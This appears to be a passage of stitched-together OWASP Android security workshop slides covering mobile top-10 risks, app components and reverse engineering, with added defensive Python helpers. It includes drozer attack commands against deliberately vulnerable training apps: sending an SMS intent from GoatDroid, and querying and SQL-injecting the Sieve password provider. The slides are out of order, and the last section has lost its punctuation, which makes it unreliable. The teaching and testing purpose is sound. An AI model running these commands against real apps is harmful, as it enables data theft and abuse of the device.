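    if target == base or target.startswith(base + os.sep):
        return target
    return None


def read_backup(base_dir, requested):
    """Behaviour of a hardened openFile(): refuse first, then open read-only."""
    path = safe_resolve(base_dir, requested)
    if path is None or not os.path.isfile(path):
        raise PermissionError("refusing %r" % requested)
    with open(path, "rb") as fh:
        return fh.read()


def demo():
    """Constructed layout: backups/notes.txt plus a database.db outside the backup dir."""
    root = tempfile.mkdtemp()
    backups = os.path.join(root, "backups")
    os.mkdir(backups)
    with open(os.path.join(backups, "notes.txt"), "wb") as fh:
        fh.write(b"backup ok")
    with open(os.path.join(root, "database.db"), "wb") as fh:
        fh.write(b"secret")
    results = {}
    for req in ("notes.txt", "./notes.txt", "../database.db", "/etc/hosts"):
        try:
            results[req] = read_backup(backups, req)
        except PermissionError:
            results[req] = None   # refused: traversal or absolute path
    return results


if __name__ == "__main__":
    for req, data in demo().items():
        print("%-16s -> %r" % (req, data))
```

Comparing against the canonical (realpath) base also defeats symlinks planted inside the backup directory, which a plain string check on the unresolved path would miss.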
Content providers demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.

Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send the intent and enjoy

Sample manifest from GoatDroid:

    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />

The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action:

    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        // extras from whoever sent the broadcast go straight to SmsManager
        sms.sendTextMessage(bundle.getString("phoneNumber"), null,
                bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }

    dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED

General defenses for App Components
Applies to all of the above-mentioned items:
• Setting the android:exported attribute to false (only components running under the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
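One way to find the components these attacks need, as an added example that is not part of the slides or of drozer: a Python script that reads an AndroidManifest.xml and reports every activity, service, receiver and provider that is exported (explicitly, or implicitly through an intent-filter) without an android:permission, plus android:debuggable. The embedded manifest is constructed; its receiver is modelled on the GoatDroid one above, but the package, permission and component names are placeholders.

```python
"""Audit an AndroidManifest.xml for components reachable from other apps.

Added example; not code from the workshop slides or from drozer. It applies the
rule the slides describe: a component is attackable from outside when it is
exported and carries no android:permission. The manifest below is constructed
for the example; its receiver is modelled on the GoatDroid SendSMSNowReceiver,
but every package, permission and component name here is a placeholder.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.example.constructed">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="org.example.constructed.ADMIN"
      android:protectionLevel="signature" />
  <application android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true" />
    <activity android:name=".AdminActivity" android:exported="true"
        android:permission="org.example.constructed.ADMIN" />
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.example.constructed.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="false" />
    <provider android:name=".DBContentProvider"
        android:authorities="org.example.constructed.db" />
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _is_launcher(elem):
    """The MAIN/LAUNCHER activity has to be exported, so it is not reported."""
    for flt in elem.findall("intent-filter"):
        actions = {_attr(a, "name") for a in flt.findall("action")}
        cats = {_attr(c, "name") for c in flt.findall("category")}
        if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
            return True
    return False


def exported_reason(elem, min_sdk):
    """Return why the component is reachable from other apps, or None if it is not.

    Without an explicit android:exported, activities/services/receivers are
    exported exactly when they declare an <intent-filter>; providers were
    exported by default before API 17 (simplified here to minSdkVersion < 17).
    """
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return "android:exported=true" if explicit.lower() == "true" else None
    if elem.tag == "provider":
        return "provider default before API 17" if min_sdk < 17 else None
    if elem.find("intent-filter") is not None:
        return "has <intent-filter>, exported by default"
    return None


def audit_manifest(xml_text):
    """Return findings as (tag, android:name, issue) tuples."""
    if isinstance(xml_text, str):
        xml_text = xml_text.encode("utf-8")
    root = ET.fromstring(xml_text)
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1) if uses_sdk is not None else 1
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if (_attr(app, "debuggable") or "").lower() == "true":
        findings.append(("application", root.get("package"), "android:debuggable=true"))
    for elem in app:
        if elem.tag not in COMPONENT_TAGS:
            continue
        if elem.tag == "activity" and _is_launcher(elem):
            continue
        reason = exported_reason(elem, min_sdk)
        if reason is not None and _attr(elem, "permission") is None:
            findings.append((elem.tag, _attr(elem, "name"), reason + ", no android:permission"))
    return findings


if __name__ == "__main__":
    for tag, name, issue in audit_manifest(SAMPLE_MANIFEST):
        print("%-12s %-42s %s" % (tag, name, issue))
```

Run it on the decoded manifest from apktool (or from `dz> run app.package.manifest`); a component that shows up here is exactly what the drozer commands in the previous slides will be able to reach. A custom permission with protectionLevel normal or dangerous still lets any app that requests it through, so the AdminActivity line is clean only because its permission is signature-level.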
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing

Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications.
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format.
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – plain text configuration files
  – cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:

    adb pull /data/data/<apk_package_name>

Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage.
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly.
What do you mean "incorrectly"?
• Insecure implementations are:
  – using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – securing only part of the communication (e.g. only authentication)
  – lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:

    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
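The pseudocode above made concrete, as an added example (not from the slides): Android pins are normally the SHA-256 of the server's SubjectPublicKeyInfo in the "sha256/<base64>" form used by network_security_config, compared against a pin set compiled into the app. The SPKI byte strings here are constructed placeholders, not real keys.

```python
"""Certificate pinning check: the slide's if/else made concrete.

Added example, not from the slides. Android pinning normally compares the
SHA-256 of the server's SubjectPublicKeyInfo (the format used by
network_security_config's <pin digest="SHA-256">) with a set of pins compiled
into the app. The SPKI byte strings below are constructed placeholders.
"""
import base64
import hashlib
import hmac


def spki_pin(spki_der):
    """Return the pin string for a DER-encoded SubjectPublicKeyInfo."""
    digest = hashlib.sha256(spki_der).digest()
    return "sha256/" + base64.b64encode(digest).decode("ascii")


def pin_matches(presented_spki_der, pinned):
    """True if the presented key's pin is in the pinned set (constant-time compare)."""
    presented = spki_pin(presented_spki_der).encode("ascii")
    ok = False
    for pin in pinned:
        # Check every pin without short-circuiting so timing does not reveal which one matched.
        ok |= hmac.compare_digest(presented, pin.encode("ascii"))
    return ok


def decide(presented_spki_der, pinned):
    """The slide's if/else: start the connection only when a pin matches."""
    if pin_matches(presented_spki_der, pinned):
        return "Start_connection"
    return "Drop_connection"


# Constructed stand-ins for the SPKI bytes of the expected server key, a backup key
# prepared for the next rotation, and some other key an interception proxy might present.
EXPECTED_SPKI = b"constructed-spki-of-expected-server-key"
BACKUP_SPKI = b"constructed-spki-of-backup-key"
OTHER_SPKI = b"constructed-spki-of-some-other-key"

# Primary pin plus a backup pin, so rotating the server key does not lock users out.
PINNED = {spki_pin(EXPECTED_SPKI), spki_pin(BACKUP_SPKI)}


if __name__ == "__main__":
    for label, spki in (("expected", EXPECTED_SPKI), ("backup", BACKUP_SPKI), ("other", OTHER_SPKI)):
        print("%-8s %s -> %s" % (label, spki_pin(spki), decide(spki, PINNED)))
```

Pinning runs after normal chain validation, not instead of it: the 21 "trust all certificates" apps from the next slide fail before this check is even reached. Pinning the public key rather than the leaf certificate is what lets a certificate be renewed with the same key without an app update.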
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:

    mallodroid.py -f AppToCheck.apk -d javaout

• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):

    sslyze --regular www.example.com:443

Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device.
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages.
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:

    dz> run app.provider.finduri <package_name>

• Use logcat to verify what is being logged, using ADB:

    adb logcat [output filter]

• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
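A reviewer's helper for the two hunts above (M2's look through a pulled /data/data tree and M4's logcat review), as an added Python example that is not part of the slides: it flags world-readable files and plaintext secrets under the app's data directory, and the logcat lines that carry password, token or card-like data. The directory tree and the log lines are constructed here; the patterns are deliberately broad starting points for a human to triage.

```python
"""Scan a pulled /data/data/<pkg> tree and logcat output for leaked secrets.

Added example, not from the slides. It serves two checks from the talk: the
insecure-data-storage hunt through shared_prefs/databases/files after
`adb pull`, and the logcat review for unintended leakage. The directory tree
and the log lines are constructed so the script runs offline. File-mode checks
assume a POSIX host (the pulled tree keeps the modes Android gave the files).
"""
import os
import re
import stat
import tempfile

# Patterns a reviewer greps for. Deliberately broad: a human triages the hits.
SECRET_PATTERNS = [
    ("password", re.compile(r'(?i)(password|passwd|pwd)["\s:=]+\S+')),
    ("token", re.compile(r'(?i)(token|api[_-]?key|secret)["\s:=]+\S+')),
    ("card", re.compile(r'\b(?:\d[ -]?){13,19}\b')),
]


def find_secrets(text):
    """Return the names of the patterns that match anywhere in text."""
    return [name for name, rx in SECRET_PATTERNS if rx.search(text)]


def scan_data_dir(path):
    """Walk a pulled app data directory; flag world-readable files and plaintext secrets."""
    findings = []
    for dirpath, _, files in os.walk(path):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, path)
            if os.stat(full).st_mode & stat.S_IROTH:   # MODE_WORLD_READABLE leaves this bit set
                findings.append((rel, "world-readable"))
            with open(full, "rb") as fh:
                text = fh.read(1 << 20).decode("utf-8", "replace")
            for name in find_secrets(text):
                findings.append((rel, "plaintext " + name))
    return sorted(findings)


# logcat "brief" format: <level>/<tag>(<pid>): <message>
_LOGCAT_LINE = re.compile(r'^[VDIWEF]/([^(]+)\(\s*\d+\):\s*(.*)$')


def scan_logcat(lines):
    """Return (tag, pattern) pairs for logcat lines that carry secrets."""
    hits = []
    for line in lines:
        m = _LOGCAT_LINE.match(line)
        if not m:
            continue
        tag, msg = m.group(1).strip(), m.group(2)
        for name in find_secrets(msg):
            hits.append((tag, name))
    return hits


def build_sample_tree():
    """Constructed stand-in for `adb pull /data/data/org.example.app`."""
    root = tempfile.mkdtemp()
    prefs = os.path.join(root, "shared_prefs")
    os.mkdir(prefs)
    creds = os.path.join(prefs, "creds.xml")
    with open(creds, "w") as fh:
        fh.write('<map><string name="password">hunter2</string></map>\n')
    os.chmod(creds, 0o664)   # what a MODE_WORLD_READABLE preferences file looks like
    session = os.path.join(root, "files", "session.json")
    os.mkdir(os.path.dirname(session))
    with open(session, "w") as fh:
        fh.write('{"token": "eyJhbGciOi..."}\n')   # constructed, not a real token
    os.chmod(session, 0o600)
    return root


# Constructed logcat lines in brief format.
SAMPLE_LOGCAT = [
    "D/LoginActivity( 4321): logging in user=alice password=hunter2",
    "I/ActivityManager(  812): Displayed org.example.app/.MainActivity",
    "V/HttpClient( 4321): Authorization: token abc123def",
    "W/PaymentView( 4321): card 4111 1111 1111 1111 accepted",
]


if __name__ == "__main__":
    for rel, issue in scan_data_dir(build_sample_tree()):
        print("file   %-28s %s" % (rel, issue))
    for tag, name in scan_logcat(SAMPLE_LOGCAT):
        print("logcat %-28s %s" % (tag, name))
```

Feed scan_logcat() the output of `adb logcat -v brief` captured while exercising the login and payment flows; the file scan is only meaningful on the tree pulled from a device or emulator where the package's files are readable, so run it on a rooted test device, not on the production build's data.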
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication.
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:

    dz> run app.activity.start --component <component_name>

• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not be enabled by default.
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way.
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the passwords to decrypt it in code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead.
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side).
• The malicious code can come from:
  – another application via intent/content provider
  – a shared file
  – a server response
  – a third party website
Client side injection – what to inject
• SQL injection into a local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, running a new activity, etc.) via special objects called Intents:

    // implicit intents: only the action (and data) are given, the system picks the handler
    Intent viewIntent = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent captureIntent = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);

Client side injection – how to find
• SQL injections:

    dz> run scanner.provider.injection -a <package_name>

• Data path traversal:

    dz> run scanner.provider.traversal -a <package_name>

• Intent injections:

    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent

Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm://" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use.
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party or never expires, then you have a problem.
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – verify if a session is destroyed after the authentication state changes (e.g. switching from any logged-in user to another logged-in user)
  – verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
  - http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
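The mitigations listed above as a minimal server-side session store, added here as an example (not from the slides): tokens from secrets.token_urlsafe, an idle timeout, rotation when the authentication state changes, and a logout that destroys all of a user's tokens. The 30-minute timeout and the fake clock are assumptions for the demo.

```python
"""Server-side session handling that implements the slide's mitigations.

Added example, not from the slides. Tokens come from secrets.token_urlsafe
(high entropy, never a device ID), every token has an idle timeout, a change
of authentication state rotates the token, and logout invalidates all of a
user's sessions. The clock is injected so the expiry can be checked offline.
"""
import secrets
import time

IDLE_TIMEOUT = 30 * 60   # seconds; assumed value, matches the slide's "try again after 30 minutes"


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # token -> {"user": str, "last_seen": float}

    def create(self, user):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, 43 URL-safe chars
        self._sessions[token] = {"user": user, "last_seen": self._clock()}
        return token

    def validate(self, token):
        """Return the user for a live token, or None (and drop it) if expired or unknown."""
        sess = self._sessions.get(token)
        if sess is None:
            return None
        now = self._clock()
        if now - sess["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[token]   # server-side invalidation, not just a cookie expiry
            return None
        sess["last_seen"] = now
        return sess["user"]

    def rotate(self, token, user):
        """Authentication state changed (login, step-up, privilege change): issue a fresh token."""
        self._sessions.pop(token, None)
        return self.create(user)

    def logout(self, user):
        """Destroy every session of the user, not only the one that called logout."""
        dead = [t for t, s in self._sessions.items() if s["user"] == user]
        for t in dead:
            del self._sessions[t]
        return len(dead)


class FakeClock:
    """Deterministic clock for the demo; production code uses time.time."""
    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def demo():
    """Walk through the three checks the slide lists; returns what a tester would observe."""
    clock = FakeClock()
    store = SessionStore(clock)
    t1 = store.create("alice")
    clock.advance(IDLE_TIMEOUT + 1)
    expired = store.validate(t1)             # the copied cookie no longer works
    t2 = store.create("alice")
    t3 = store.rotate(t2, "alice")           # e.g. after a second authentication step
    old_after_rotate = store.validate(t2)    # the pre-change token is dead
    new_after_rotate = store.validate(t3)
    t4 = store.create("alice")               # a second device
    killed = store.logout("alice")           # both remaining sessions go
    return {
        "expired": expired,
        "old_after_rotate": old_after_rotate,
        "new_after_rotate": new_after_rotate,
        "killed": killed,
        "after_logout": store.validate(t4),
        "token_length": len(t3),
    }


if __name__ == "__main__":
    print(demo())
```

The guessable-token check from the slide is answered by where the token comes from: 32 random bytes from the CSPRNG, with nothing derived from the device ID, the user name or the time, so there is no other session to guess.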
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APKOptic
  – Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling
  – high level – Java code
• Disassembling
  – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
(figure: DEX → JAR → JAVA)
Decompiling - Dex2Jar
• dex2jar
  – converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – closed source Java decompiler
  – combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
(figure: JD-GUI output next to Luyten output)
Disassembling
(figure: DEX → SMALI)
• Apktool
  – open source Java tool for reverse-engineering Android apps
  – transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:

    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk

• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali files
Demo
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
